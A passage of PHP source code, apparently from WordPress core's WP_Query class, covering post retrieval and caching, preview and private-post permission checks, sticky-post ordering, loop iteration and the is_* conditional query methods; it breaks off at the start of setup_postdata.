$this->request = apply_filters( 'posts_request_ids', $this->request, $this );
$post_ids = $wpdb->get_col( $this->request );
if ( $post_ids ) {
$this->posts = $post_ids;
$this->set_found_posts( $query_vars, $limits );
_prime_post_caches( $post_ids, $query_vars['update_post_term_cache'], $query_vars['update_post_meta_cache'] );
} else {
$this->posts = array();
}
} else {
$this->posts = $wpdb->get_results( $this->request );
$this->set_found_posts( $query_vars, $limits );
}
}
// Convert to WP_Post objects.
if ( $this->posts ) {
/** @var WP_Post[] */
$this->posts = array_map( 'get_post', $this->posts );
}
$unfiltered_posts = $this->posts;
if ( $query_vars['cache_results'] && $id_query_is_cacheable && ! $cache_found ) {
$post_ids = wp_list_pluck( $this->posts, 'ID' );
$cache_value = array(
'posts' => $post_ids,
'found_posts' => $this->found_posts,
'max_num_pages' => $this->max_num_pages,
);
wp_cache_set_salted( $cache_key, $cache_value, 'post-queries', $last_changed );
}
if ( ! $query_vars['suppress_filters'] ) {
/**
* Filters the raw post results array, prior to status checks.
*
* @since 2.3.0
*
* @param WP_Post[] $posts Array of post objects.
* @param WP_Query $query The WP_Query instance (passed by reference).
*/
$this->posts = apply_filters_ref_array( 'posts_results', array( $this->posts, &$this ) );
}
if ( ! empty( $this->posts ) && $this->is_comment_feed && $this->is_singular ) {
/** This filter is documented in wp-includes/query.php */
$cjoin = apply_filters_ref_array( 'comment_feed_join', array( '', &$this ) );
/** This filter is documented in wp-includes/query.php */
$cwhere = apply_filters_ref_array( 'comment_feed_where', array( "WHERE comment_post_ID = '{$this->posts[0]->ID}' AND comment_approved = '1'", &$this ) );
/** This filter is documented in wp-includes/query.php */
$cgroupby = apply_filters_ref_array( 'comment_feed_groupby', array( '', &$this ) );
$cgroupby = ( ! empty( $cgroupby ) ) ? 'GROUP BY ' . $cgroupby : '';
/** This filter is documented in wp-includes/query.php */
$corderby = apply_filters_ref_array( 'comment_feed_orderby', array( 'comment_date_gmt DESC', &$this ) );
$corderby = ( ! empty( $corderby ) ) ? 'ORDER BY ' . $corderby : '';
/** This filter is documented in wp-includes/query.php */
$climits = apply_filters_ref_array( 'comment_feed_limits', array( 'LIMIT ' . get_option( 'posts_per_rss' ), &$this ) );
$comments_request = "SELECT {$wpdb->comments}.comment_ID FROM {$wpdb->comments} $cjoin $cwhere $cgroupby $corderby $climits";
$comment_key = md5( $comments_request );
$comment_last_changed = wp_cache_get_last_changed( 'comment' );
$comment_cache_key = "comment_feed:$comment_key";
$comment_ids = wp_cache_get_salted( $comment_cache_key, 'comment-queries', $comment_last_changed );
if ( false === $comment_ids ) {
$comment_ids = $wpdb->get_col( $comments_request );
wp_cache_set_salted( $comment_cache_key, $comment_ids, 'comment-queries', $comment_last_changed );
}
_prime_comment_caches( $comment_ids );
// Convert to WP_Comment.
/** @var WP_Comment[] */
$this->comments = array_map( 'get_comment', $comment_ids );
$this->comment_count = count( $this->comments );
}
// Check post status to determine if post should be displayed.
if ( ! empty( $this->posts ) && ( $this->is_single || $this->is_page ) ) {
$status = get_post_status( $this->posts[0] );
if ( 'attachment' === $this->posts[0]->post_type && 0 === (int) $this->posts[0]->post_parent ) {
$this->is_page = false;
$this->is_single = true;
$this->is_attachment = true;
}
// If the post_status was specifically requested, let it pass through.
if ( ! in_array( $status, $q_status, true ) ) {
$post_status_obj = get_post_status_object( $status );
if ( $post_status_obj && ! $post_status_obj->public ) {
if ( ! is_user_logged_in() ) {
// User must be logged in to view unpublished posts.
$this->posts = array();
} else {
if ( $post_status_obj->protected ) {
// User must have edit permissions on the draft to preview.
if ( ! current_user_can( $edit_cap, $this->posts[0]->ID ) ) {
$this->posts = array();
} else {
$this->is_preview = true;
if ( 'future' !== $status ) {
$this->posts[0]->post_date = current_time( 'mysql' );
}
}
} elseif ( $post_status_obj->private ) {
if ( ! current_user_can( $read_cap, $this->posts[0]->ID ) ) {
$this->posts = array();
}
} else {
$this->posts = array();
}
}
} elseif ( ! $post_status_obj ) {
// Post status is not registered, assume it's not public.
if ( ! current_user_can( $edit_cap, $this->posts[0]->ID ) ) {
$this->posts = array();
}
}
}
if ( $this->is_preview && $this->posts && current_user_can( $edit_cap, $this->posts[0]->ID ) ) {
/**
* Filters the single post for preview mode.
*
* @since 2.7.0
*
* @param WP_Post $post_preview The Post object.
* @param WP_Query $query The WP_Query instance (passed by reference).
*/
$this->posts[0] = get_post( apply_filters_ref_array( 'the_preview', array( $this->posts[0], &$this ) ) );
}
}
// Put sticky posts at the top of the posts array.
$sticky_posts = get_option( 'sticky_posts' );
if ( $this->is_home && $page <= 1 && is_array( $sticky_posts ) && ! empty( $sticky_posts ) && ! $query_vars['ignore_sticky_posts'] ) {
$num_posts = count( $this->posts );
$sticky_offset = 0;
// Loop over posts and relocate stickies to the front.
for ( $i = 0; $i < $num_posts; $i++ ) {
if ( in_array( $this->posts[ $i ]->ID, $sticky_posts, true ) ) {
$sticky_post = $this->posts[ $i ];
// Remove sticky from current position.
array_splice( $this->posts, $i, 1 );
// Move to front, after other stickies.
array_splice( $this->posts, $sticky_offset, 0, array( $sticky_post ) );
// Increment the sticky offset. The next sticky will be placed at this offset.
++$sticky_offset;
// Remove post from sticky posts array.
$offset = array_search( $sticky_post->ID, $sticky_posts, true );
unset( $sticky_posts[ $offset ] );
}
}
// If any posts have been excluded specifically, Ignore those that are sticky.
if ( ! empty( $sticky_posts ) && ! empty( $query_vars['post__not_in'] ) ) {
$sticky_posts = array_diff( $sticky_posts, $query_vars['post__not_in'] );
}
// Fetch sticky posts that weren't in the query results.
if ( ! empty( $sticky_posts ) ) {
$stickies = get_posts(
array(
'post__in' => $sticky_posts,
'post_type' => $post_type,
'post_status' => 'publish',
'posts_per_page' => count( $sticky_posts ),
'suppress_filters' => $query_vars['suppress_filters'],
'cache_results' => $query_vars['cache_results'],
'update_post_meta_cache' => $query_vars['update_post_meta_cache'],
'update_post_term_cache' => $query_vars['update_post_term_cache'],
'lazy_load_term_meta' => $query_vars['lazy_load_term_meta'],
)
);
foreach ( $stickies as $sticky_post ) {
array_splice( $this->posts, $sticky_offset, 0, array( $sticky_post ) );
++$sticky_offset;
}
}
}
if ( ! $query_vars['suppress_filters'] ) {
/**
* Filters the array of retrieved posts after they've been fetched and
* internally processed.
*
* @since 1.5.0
*
* @param WP_Post[] $posts Array of post objects.
* @param WP_Query $query The WP_Query instance (passed by reference).
*/
$this->posts = apply_filters_ref_array( 'the_posts', array( $this->posts, &$this ) );
}
/*
* Ensure that any posts added/modified via one of the filters above are
* of the type WP_Post and are filtered.
*/
if ( $this->posts ) {
$this->post_count = count( $this->posts );
/** @var WP_Post[] */
$this->posts = array_map( 'get_post', $this->posts );
if ( $query_vars['cache_results'] ) {
if ( $is_unfiltered_query && $unfiltered_posts === $this->posts ) {
update_post_caches( $this->posts, $post_type, $query_vars['update_post_term_cache'], $query_vars['update_post_meta_cache'] );
} else {
$post_ids = wp_list_pluck( $this->posts, 'ID' );
_prime_post_caches( $post_ids, $query_vars['update_post_term_cache'], $query_vars['update_post_meta_cache'] );
}
}
/** @var WP_Post */
$this->post = reset( $this->posts );
} else {
$this->post_count = 0;
$this->posts = array();
}
if ( ! empty( $this->posts ) && $query_vars['update_menu_item_cache'] ) {
update_menu_item_cache( $this->posts );
}
if ( $query_vars['lazy_load_term_meta'] ) {
wp_queue_posts_for_term_meta_lazyload( $this->posts );
}
return $this->posts;
}
/**
* Sets up the amount of found posts and the number of pages (if limit clause was used)
* for the current query.
*
* @since 3.5.0
*
* @global wpdb $wpdb WordPress database abstraction object.
*
* @param array $query_vars Query variables.
* @param string $limits LIMIT clauses of the query.
*/
private function set_found_posts( $query_vars, $limits ) {
global $wpdb;
/*
* Bail if posts is an empty array. Continue if posts is an empty string,
* null, or false to accommodate caching plugins that fill posts later.
*/
if ( $query_vars['no_found_rows'] || ( is_array( $this->posts ) && ! $this->posts ) ) {
return;
}
if ( ! empty( $limits ) ) {
/**
* Filters the query to run for retrieving the found posts.
*
* @since 2.1.0
*
* @param string $found_posts_query The query to run to find the found posts.
* @param WP_Query $query The WP_Query instance (passed by reference).
*/
$found_posts_query = apply_filters_ref_array( 'found_posts_query', array( 'SELECT FOUND_ROWS()', &$this ) );
$this->found_posts = (int) $wpdb->get_var( $found_posts_query );
} else {
if ( is_array( $this->posts ) ) {
$this->found_posts = count( $this->posts );
} else {
if ( null === $this->posts ) {
$this->found_posts = 0;
} else {
$this->found_posts = 1;
}
}
}
/**
* Filters the number of found posts for the query.
*
* @since 2.1.0
*
* @param int $found_posts The number of posts found.
* @param WP_Query $query The WP_Query instance (passed by reference).
*/
$this->found_posts = (int) apply_filters_ref_array( 'found_posts', array( $this->found_posts, &$this ) );
if ( ! empty( $limits ) ) {
$this->max_num_pages = (int) ceil( $this->found_posts / $query_vars['posts_per_page'] );
}
}
/**
* Sets up the next post and iterate current post index.
*
* @since 1.5.0
*
* @return WP_Post Next post.
*/
public function next_post() {
++$this->current_post;
/** @var WP_Post */
$this->post = $this->posts[ $this->current_post ];
return $this->post;
}
/**
* Sets up the current post.
*
* Retrieves the next post, sets up the post, sets the 'in the loop'
* property to true.
*
* @since 1.5.0
*
* @global WP_Post $post Global post object.
*/
public function the_post() {
global $post;
if ( ! $this->in_the_loop ) {
if ( 'all' === $this->query_vars['fields'] ) {
// Full post objects queried.
$post_objects = $this->posts;
} else {
if ( 'ids' === $this->query_vars['fields'] ) {
// Post IDs queried.
$post_ids = $this->posts;
} else {
// Only partial objects queried, need to prime the cache for the loop.
$post_ids = array_reduce(
$this->posts,
function ( $carry, $post ) {
if ( isset( $post->ID ) ) {
$carry[] = $post->ID;
}
return $carry;
},
array()
);
}
_prime_post_caches( $post_ids, $this->query_vars['update_post_term_cache'], $this->query_vars['update_post_meta_cache'] );
$post_objects = array_map( 'get_post', $post_ids );
}
update_post_author_caches( $post_objects );
}
$this->in_the_loop = true;
$this->before_loop = false;
if ( -1 === $this->current_post ) { // Loop has just started.
/**
* Fires once the loop is started.
*
* @since 2.0.0
*
* @param WP_Query $query The WP_Query instance (passed by reference).
*/
do_action_ref_array( 'loop_start', array( &$this ) );
}
$post = $this->next_post();
// Ensure a full post object is available.
if ( 'all' !== $this->query_vars['fields'] ) {
if ( 'ids' === $this->query_vars['fields'] ) {
// Post IDs queried.
$post = get_post( $post );
} elseif ( isset( $post->ID ) ) {
/*
* Partial objecct queried.
*
* The post object was queried with a partial set of
* fields, populate the entire object for the loop.
*/
$post = get_post( $post->ID );
}
}
// Set up the global post object for the loop.
$this->setup_postdata( $post );
}
/**
* Determines whether there are more posts available in the loop.
*
* Calls the {@see 'loop_end'} action when the loop is complete.
*
* @since 1.5.0
*
* @return bool True if posts are available, false if end of the loop.
*/
public function have_posts() {
if ( $this->current_post + 1 < $this->post_count ) {
return true;
} elseif ( $this->current_post + 1 === $this->post_count && $this->post_count > 0 ) {
/**
* Fires once the loop has ended.
*
* @since 2.0.0
*
* @param WP_Query $query The WP_Query instance (passed by reference).
*/
do_action_ref_array( 'loop_end', array( &$this ) );
// Do some cleaning up after the loop.
$this->rewind_posts();
} elseif ( 0 === $this->post_count ) {
$this->before_loop = false;
/**
* Fires if no results are found in a post query.
*
* @since 4.9.0
*
* @param WP_Query $query The WP_Query instance.
*/
do_action( 'loop_no_results', $this );
}
$this->in_the_loop = false;
return false;
}
/**
* Rewinds the posts and resets post index.
*
* @since 1.5.0
*/
public function rewind_posts() {
$this->current_post = -1;
if ( $this->post_count > 0 ) {
$this->post = $this->posts[0];
}
}
/**
* Iterates current comment index and returns WP_Comment object.
*
* @since 2.2.0
*
* @return WP_Comment Comment object.
*/
public function next_comment() {
++$this->current_comment;
/** @var WP_Comment */
$this->comment = $this->comments[ $this->current_comment ];
return $this->comment;
}
/**
* Sets up the current comment.
*
* @since 2.2.0
*
* @global WP_Comment $comment Global comment object.
*/
public function the_comment() {
global $comment;
$comment = $this->next_comment();
if ( 0 === $this->current_comment ) {
/**
* Fires once the comment loop is started.
*
* @since 2.2.0
*/
do_action( 'comment_loop_start' );
}
}
/**
* Determines whether there are more comments available.
*
* Automatically rewinds comments when finished.
*
* @since 2.2.0
*
* @return bool True if comments are available, false if no more comments.
*/
public function have_comments() {
if ( $this->current_comment + 1 < $this->comment_count ) {
return true;
} elseif ( $this->current_comment + 1 === $this->comment_count ) {
$this->rewind_comments();
}
return false;
}
/**
* Rewinds the comments, resets the comment index and comment to first.
*
* @since 2.2.0
*/
public function rewind_comments() {
$this->current_comment = -1;
if ( $this->comment_count > 0 ) {
$this->comment = $this->comments[0];
}
}
/**
* Sets up the WordPress query by parsing query string.
*
* @since 1.5.0
*
* @see WP_Query::parse_query() for all available arguments.
*
* @param string|array $query URL query string or array of query arguments.
* @return WP_Post[]|int[] Array of post objects or post IDs.
*/
public function query( $query ) {
$this->init();
$this->query = wp_parse_args( $query );
$this->query_vars = $this->query;
return $this->get_posts();
}
/**
* Retrieves the currently queried object.
*
* If queried object is not set, then the queried object will be set from
* the category, tag, taxonomy, posts page, single post, page, or author
* query variable. After it is set up, it will be returned.
*
* @since 1.5.0
*
* @return WP_Term|WP_Post_Type|WP_Post|WP_User|null The queried object.
*/
public function get_queried_object() {
if ( isset( $this->queried_object ) ) {
return $this->queried_object;
}
$this->queried_object = null;
$this->queried_object_id = null;
if ( $this->is_category || $this->is_tag || $this->is_tax ) {
if ( $this->is_category ) {
$cat = $this->get( 'cat' );
$category_name = $this->get( 'category_name' );
if ( $cat ) {
$term = get_term( $cat, 'category' );
} elseif ( $category_name ) {
$term = get_term_by( 'slug', $category_name, 'category' );
}
} elseif ( $this->is_tag ) {
$tag_id = $this->get( 'tag_id' );
$tag = $this->get( 'tag' );
if ( $tag_id ) {
$term = get_term( $tag_id, 'post_tag' );
} elseif ( $tag ) {
$term = get_term_by( 'slug', $tag, 'post_tag' );
}
} else {
// For other tax queries, grab the first term from the first clause.
if ( ! empty( $this->tax_query->queried_terms ) ) {
$queried_taxonomies = array_keys( $this->tax_query->queried_terms );
$matched_taxonomy = reset( $queried_taxonomies );
$query = $this->tax_query->queried_terms[ $matched_taxonomy ];
if ( ! empty( $query['terms'] ) ) {
if ( 'term_id' === $query['field'] ) {
$term = get_term( reset( $query['terms'] ), $matched_taxonomy );
} else {
$term = get_term_by( $query['field'], reset( $query['terms'] ), $matched_taxonomy );
}
}
}
}
if ( ! empty( $term ) && ! is_wp_error( $term ) ) {
$this->queried_object = $term;
$this->queried_object_id = (int) $term->term_id;
if ( $this->is_category && 'category' === $this->queried_object->taxonomy ) {
_make_cat_compat( $this->queried_object );
}
}
} elseif ( $this->is_post_type_archive ) {
$post_type = $this->get( 'post_type' );
if ( is_array( $post_type ) ) {
$post_type = reset( $post_type );
}
$this->queried_object = get_post_type_object( $post_type );
} elseif ( $this->is_posts_page ) {
$page_for_posts = get_option( 'page_for_posts' );
$this->queried_object = get_post( $page_for_posts );
$this->queried_object_id = (int) $this->queried_object->ID;
} elseif ( $this->is_singular && ! empty( $this->post ) ) {
$this->queried_object = $this->post;
$this->queried_object_id = (int) $this->post->ID;
} elseif ( $this->is_author ) {
$author = (int) $this->get( 'author' );
$author_name = $this->get( 'author_name' );
if ( $author ) {
$this->queried_object_id = $author;
} elseif ( $author_name ) {
$user = get_user_by( 'slug', $author_name );
if ( $user ) {
$this->queried_object_id = $user->ID;
}
}
$this->queried_object = get_userdata( $this->queried_object_id );
}
return $this->queried_object;
}
/**
* Retrieves the ID of the currently queried object.
*
* @since 1.5.0
*
* @return int
*/
public function get_queried_object_id() {
$this->get_queried_object();
if ( isset( $this->queried_object_id ) ) {
return $this->queried_object_id;
}
return 0;
}
/**
* Constructor.
*
* Sets up the WordPress query, if parameter is not empty.
*
* @since 1.5.0
*
* @see WP_Query::parse_query() for all available arguments.
*
* @param string|array $query URL query string or array of vars.
*/
public function __construct( $query = '' ) {
if ( ! empty( $query ) ) {
$this->query( $query );
}
}
/**
* Makes private properties readable for backward compatibility.
*
* @since 4.0.0
*
* @param string $name Property to get.
* @return mixed Property.
*/
public function __get( $name ) {
if ( in_array( $name, $this->compat_fields, true ) ) {
return $this->$name;
}
}
/**
* Makes private properties checkable for backward compatibility.
*
* @since 4.0.0
*
* @param string $name Property to check if set.
* @return bool Whether the property is set.
*/
public function __isset( $name ) {
if ( in_array( $name, $this->compat_fields, true ) ) {
return isset( $this->$name );
}
return false;
}
/**
* Makes private/protected methods readable for backward compatibility.
*
* @since 4.0.0
*
* @param string $name Method to call.
* @param array $arguments Arguments to pass when calling.
* @return mixed|false Return value of the callback, false otherwise.
*/
public function __call( $name, $arguments ) {
if ( in_array( $name, $this->compat_methods, true ) ) {
return $this->$name( ...$arguments );
}
return false;
}
/**
* Determines whether the query is for an existing archive page.
*
* Archive pages include category, tag, author, date, custom post type,
* and custom taxonomy based archives.
*
* @since 3.1.0
*
* @see WP_Query::is_category()
* @see WP_Query::is_tag()
* @see WP_Query::is_author()
* @see WP_Query::is_date()
* @see WP_Query::is_post_type_archive()
* @see WP_Query::is_tax()
*
* @return bool Whether the query is for an existing archive page.
*/
public function is_archive() {
return (bool) $this->is_archive;
}
/**
* Determines whether the query is for an existing post type archive page.
*
* @since 3.1.0
*
* @param string|string[] $post_types Optional. Post type or array of posts types
* to check against. Default empty.
* @return bool Whether the query is for an existing post type archive page.
*/
public function is_post_type_archive( $post_types = '' ) {
if ( empty( $post_types ) || ! $this->is_post_type_archive ) {
return (bool) $this->is_post_type_archive;
}
$post_type = $this->get( 'post_type' );
if ( is_array( $post_type ) ) {
$post_type = reset( $post_type );
}
$post_type_object = get_post_type_object( $post_type );
if ( ! $post_type_object ) {
return false;
}
return in_array( $post_type_object->name, (array) $post_types, true );
}
/**
* Determines whether the query is for an existing attachment page.
*
* @since 3.1.0
*
* @param int|string|int[]|string[] $attachment Optional. Attachment ID, title, slug, or array of such
* to check against. Default empty.
* @return bool Whether the query is for an existing attachment page.
*/
public function is_attachment( $attachment = '' ) {
if ( ! $this->is_attachment ) {
return false;
}
if ( empty( $attachment ) ) {
return true;
}
$attachment = array_map( 'strval', (array) $attachment );
$post_obj = $this->get_queried_object();
if ( ! $post_obj ) {
return false;
}
if ( in_array( (string) $post_obj->ID, $attachment, true ) ) {
return true;
} elseif ( in_array( $post_obj->post_title, $attachment, true ) ) {
return true;
} elseif ( in_array( $post_obj->post_name, $attachment, true ) ) {
return true;
}
return false;
}
/**
* Determines whether the query is for an existing author archive page.
*
* If the $author parameter is specified, this function will additionally
* check if the query is for one of the authors specified.
*
* @since 3.1.0
*
* @param int|string|int[]|string[] $author Optional. User ID, nickname, nicename, or array of such
* to check against. Default empty.
* @return bool Whether the query is for an existing author archive page.
*/
public function is_author( $author = '' ) {
if ( ! $this->is_author ) {
return false;
}
if ( empty( $author ) ) {
return true;
}
$author_obj = $this->get_queried_object();
if ( ! $author_obj ) {
return false;
}
$author = array_map( 'strval', (array) $author );
if ( in_array( (string) $author_obj->ID, $author, true ) ) {
return true;
} elseif ( in_array( $author_obj->nickname, $author, true ) ) {
return true;
} elseif ( in_array( $author_obj->user_nicename, $author, true ) ) {
return true;
}
return false;
}
/**
* Determines whether the query is for an existing category archive page.
*
* If the $category parameter is specified, this function will additionally
* check if the query is for one of the categories specified.
*
* @since 3.1.0
*
* @param int|string|int[]|string[] $category Optional. Category ID, name, slug, or array of such
* to check against. Default empty.
* @return bool Whether the query is for an existing category archive page.
*/
public function is_category( $category = '' ) {
if ( ! $this->is_category ) {
return false;
}
if ( empty( $category ) ) {
return true;
}
$cat_obj = $this->get_queried_object();
if ( ! $cat_obj ) {
return false;
}
$category = array_map( 'strval', (array) $category );
if ( in_array( (string) $cat_obj->term_id, $category, true ) ) {
return true;
} elseif ( in_array( $cat_obj->name, $category, true ) ) {
return true;
} elseif ( in_array( $cat_obj->slug, $category, true ) ) {
return true;
}
return false;
}
/**
* Determines whether the query is for an existing tag archive page.
*
* If the $tag parameter is specified, this function will additionally
* check if the query is for one of the tags specified.
*
* @since 3.1.0
*
* @param int|string|int[]|string[] $tag Optional. Tag ID, name, slug, or array of such
* to check against. Default empty.
* @return bool Whether the query is for an existing tag archive page.
*/
public function is_tag( $tag = '' ) {
if ( ! $this->is_tag ) {
return false;
}
if ( empty( $tag ) ) {
return true;
}
$tag_obj = $this->get_queried_object();
if ( ! $tag_obj ) {
return false;
}
$tag = array_map( 'strval', (array) $tag );
if ( in_array( (string) $tag_obj->term_id, $tag, true ) ) {
return true;
} elseif ( in_array( $tag_obj->name, $tag, true ) ) {
return true;
} elseif ( in_array( $tag_obj->slug, $tag, true ) ) {
return true;
}
return false;
}
/**
* Determines whether the query is for an existing custom taxonomy archive page.
*
* If the $taxonomy parameter is specified, this function will additionally
* check if the query is for that specific $taxonomy.
*
* If the $term parameter is specified in addition to the $taxonomy parameter,
* this function will additionally check if the query is for one of the terms
* specified.
*
* @since 3.1.0
*
* @global WP_Taxonomy[] $wp_taxonomies Registered taxonomies.
*
* @param string|string[] $taxonomy Optional. Taxonomy slug or slugs to check against.
* Default empty.
* @param int|string|int[]|string[] $term Optional. Term ID, name, slug, or array of such
* to check against. Default empty.
* @return bool Whether the query is for an existing custom taxonomy archive page.
* True for custom taxonomy archive pages, false for built-in taxonomies
* (category and tag archives).
*/
public function is_tax( $taxonomy = '', $term = '' ) {
global $wp_taxonomies;
if ( ! $this->is_tax ) {
return false;
}
if ( empty( $taxonomy ) ) {
return true;
}
$queried_object = $this->get_queried_object();
$tax_array = array_intersect( array_keys( $wp_taxonomies ), (array) $taxonomy );
$term_array = (array) $term;
// Check that the taxonomy matches.
if ( ! ( isset( $queried_object->taxonomy ) && count( $tax_array ) && in_array( $queried_object->taxonomy, $tax_array, true ) ) ) {
return false;
}
// Only a taxonomy provided.
if ( empty( $term ) ) {
return true;
}
return isset( $queried_object->term_id ) &&
count(
array_intersect(
array( $queried_object->term_id, $queried_object->name, $queried_object->slug ),
$term_array
)
);
}
/**
* Determines whether the current URL is within the comments popup window.
*
* @since 3.1.0
* @deprecated 4.5.0
*
* @return false Always returns false.
*/
public function is_comments_popup() {
_deprecated_function( __FUNCTION__, '4.5.0' );
return false;
}
/**
* Determines whether the query is for an existing date archive.
*
* @since 3.1.0
*
* @return bool Whether the query is for an existing date archive.
*/
public function is_date() {
return (bool) $this->is_date;
}
/**
* Determines whether the query is for an existing day archive.
*
* @since 3.1.0
*
* @return bool Whether the query is for an existing day archive.
*/
public function is_day() {
return (bool) $this->is_day;
}
/**
* Determines whether the query is for a feed.
*
* @since 3.1.0
*
* @param string|string[] $feeds Optional. Feed type or array of feed types
* to check against. Default empty.
* @return bool Whether the query is for a feed.
*/
public function is_feed( $feeds = '' ) {
if ( empty( $feeds ) || ! $this->is_feed ) {
return (bool) $this->is_feed;
}
$query_var = $this->get( 'feed' );
if ( 'feed' === $query_var ) {
$query_var = get_default_feed();
}
return in_array( $query_var, (array) $feeds, true );
}
/**
* Determines whether the query is for a comments feed.
*
* @since 3.1.0
*
* @return bool Whether the query is for a comments feed.
*/
public function is_comment_feed() {
return (bool) $this->is_comment_feed;
}
/**
* Determines whether the query is for the front page of the site.
*
* This is for what is displayed at your site's main URL.
*
* Depends on the site's "Front page displays" Reading Settings 'show_on_front' and 'page_on_front'.
*
* If you set a static page for the front page of your site, this function will return
* true when viewing that page.
*
* Otherwise the same as {@see WP_Query::is_home()}.
*
* @since 3.1.0
*
* @return bool Whether the query is for the front page of the site.
*/
public function is_front_page() {
// Most likely case.
if ( 'posts' === get_option( 'show_on_front' ) && $this->is_home() ) {
return true;
} elseif ( 'page' === get_option( 'show_on_front' ) && get_option( 'page_on_front' )
&& $this->is_page( get_option( 'page_on_front' ) )
) {
return true;
} else {
return false;
}
}
/**
* Determines whether the query is for the blog homepage.
*
* This is the page which shows the time based blog content of your site.
*
* Depends on the site's "Front page displays" Reading Settings 'show_on_front' and 'page_for_posts'.
*
* If you set a static page for the front page of your site, this function will return
* true only on the page you set as the "Posts page".
*
* @since 3.1.0
*
* @see WP_Query::is_front_page()
*
* @return bool Whether the query is for the blog homepage.
*/
public function is_home() {
return (bool) $this->is_home;
}
/**
* Determines whether the query is for the Privacy Policy page.
*
* This is the page which shows the Privacy Policy content of your site.
*
* Depends on the site's "Change your Privacy Policy page" Privacy Settings 'wp_page_for_privacy_policy'.
*
* This function will return true only on the page you set as the "Privacy Policy page".
*
* @since 5.2.0
*
* @return bool Whether the query is for the Privacy Policy page.
*/
public function is_privacy_policy() {
if ( get_option( 'wp_page_for_privacy_policy' )
&& $this->is_page( get_option( 'wp_page_for_privacy_policy' ) )
) {
return true;
} else {
return false;
}
}
/**
* Determines whether the query is for an existing month archive.
*
* @since 3.1.0
*
* @return bool Whether the query is for an existing month archive.
*/
public function is_month() {
return (bool) $this->is_month;
}
/**
* Determines whether the query is for an existing single page.
*
* If the $page parameter is specified, this function will additionally
* check if the query is for one of the pages specified.
*
* @since 3.1.0
*
* @see WP_Query::is_single()
* @see WP_Query::is_singular()
*
* @param int|string|int[]|string[] $page Optional. Page ID, title, slug, path, or array of such
* to check against. Default empty.
* @return bool Whether the query is for an existing single page.
*/
public function is_page( $page = '' ) {
if ( ! $this->is_page ) {
return false;
}
if ( empty( $page ) ) {
return true;
}
$page_obj = $this->get_queried_object();
if ( ! $page_obj ) {
return false;
}
$page = array_map( 'strval', (array) $page );
if ( in_array( (string) $page_obj->ID, $page, true ) ) {
return true;
} elseif ( in_array( $page_obj->post_title, $page, true ) ) {
return true;
} elseif ( in_array( $page_obj->post_name, $page, true ) ) {
return true;
} else {
foreach ( $page as $pagepath ) {
if ( ! strpos( $pagepath, '/' ) ) {
continue;
}
$pagepath_obj = get_page_by_path( $pagepath );
if ( $pagepath_obj && ( $pagepath_obj->ID === $page_obj->ID ) ) {
return true;
}
}
}
return false;
}
/**
* Determines whether the query is for a paged result and not for the first page.
*
* @since 3.1.0
*
* @return bool Whether the query is for a paged result.
*/
public function is_paged() {
return (bool) $this->is_paged;
}
/**
* Determines whether the query is for a post or page preview.
*
* @since 3.1.0
*
* @return bool Whether the query is for a post or page preview.
*/
public function is_preview() {
return (bool) $this->is_preview;
}
/**
* Determines whether the query is for the robots.txt file.
*
* @since 3.1.0
*
* @return bool Whether the query is for the robots.txt file.
*/
public function is_robots() {
return (bool) $this->is_robots;
}
/**
* Determines whether the query is for the favicon.ico file.
*
* @since 5.4.0
*
* @return bool Whether the query is for the favicon.ico file.
*/
public function is_favicon() {
return (bool) $this->is_favicon;
}
/**
* Determines whether the query is for a search.
*
* @since 3.1.0
*
* @return bool Whether the query is for a search.
*/
public function is_search() {
return (bool) $this->is_search;
}
/**
* Determines whether the query is for an existing single post.
*
* Works for any post type excluding pages.
*
* If the $post parameter is specified, this function will additionally
* check if the query is for one of the Posts specified.
*
* @since 3.1.0
*
* @see WP_Query::is_page()
* @see WP_Query::is_singular()
*
* @param int|string|int[]|string[] $post Optional. Post ID, title, slug, path, or array of such
* to check against. Default empty.
* @return bool Whether the query is for an existing single post.
*/
public function is_single( $post = '' ) {
if ( ! $this->is_single ) {
return false;
}
if ( empty( $post ) ) {
return true;
}
$post_obj = $this->get_queried_object();
if ( ! $post_obj ) {
return false;
}
$post = array_map( 'strval', (array) $post );
if ( in_array( (string) $post_obj->ID, $post, true ) ) {
return true;
} elseif ( in_array( $post_obj->post_title, $post, true ) ) {
return true;
} elseif ( in_array( $post_obj->post_name, $post, true ) ) {
return true;
} else {
foreach ( $post as $postpath ) {
if ( ! strpos( $postpath, '/' ) ) {
continue;
}
$postpath_obj = get_page_by_path( $postpath, OBJECT, $post_obj->post_type );
if ( $postpath_obj && ( $postpath_obj->ID === $post_obj->ID ) ) {
return true;
}
}
}
return false;
}
/**
* Determines whether the query is for an existing single post of any post type
* (post, attachment, page, custom post types).
*
* If the $post_types parameter is specified, this function will additionally
* check if the query is for one of the Posts Types specified.
*
* @since 3.1.0
*
* @see WP_Query::is_page()
* @see WP_Query::is_single()
*
* @param string|string[] $post_types Optional. Post type or array of post types
* to check against. Default empty.
* @return bool Whether the query is for an existing single post
* or any of the given post types.
*/
public function is_singular( $post_types = '' ) {
if ( empty( $post_types ) || ! $this->is_singular ) {
return (bool) $this->is_singular;
}
$post_obj = $this->get_queried_object();
if ( ! $post_obj ) {
return false;
}
return in_array( $post_obj->post_type, (array) $post_types, true );
}
/**
* Determines whether the query is for a specific time.
*
* @since 3.1.0
*
* @return bool Whether the query is for a specific time.
*/
public function is_time() {
return (bool) $this->is_time;
}
/**
* Determines whether the query is for a trackback endpoint call.
*
* @since 3.1.0
*
* @return bool Whether the query is for a trackback endpoint call.
*/
public function is_trackback() {
return (bool) $this->is_trackback;
}
/**
* Determines whether the query is for an existing year archive.
*
* @since 3.1.0
*
* @return bool Whether the query is for an existing year archive.
*/
public function is_year() {
return (bool) $this->is_year;
}
/**
* Determines whether the query is a 404 (returns no results).
*
* @since 3.1.0
*
* @return bool Whether the query is a 404 error.
*/
public function is_404() {
return (bool) $this->is_404;
}
/**
* Determines whether the query is for an embedded post.
*
* @since 4.4.0
*
* @return bool Whether the query is for an embedded post.
*/
public function is_embed() {
return (bool) $this->is_embed;
}
/**
* Determines whether the query is the main query.
*
* @since 3.3.0
*
* @global WP_Query $wp_the_query WordPress Query object.
*
* @return bool Whether the query is the main query.
*/
public function is_main_query() {
global $wp_the_query;
return $wp_the_query === $this;
}
/**
* Sets up global post data.
*
* @since 4.1.0
* @since 4.4.0 Added the ability to pass a post ID to `$post`.
*
* @global int $id
* @global WP_User $authordata
* @global string $currentday
* @global string $currentmonth
* @global int $page
* @global array $pages
* @global int $multipage
* @global int $more
* @global int $numpages
*
* @param WP_Post|object|int $post WP_Post instance or Post ID/object.
* @return true True when finished.
*/
public function setup_postdata( $post ) {
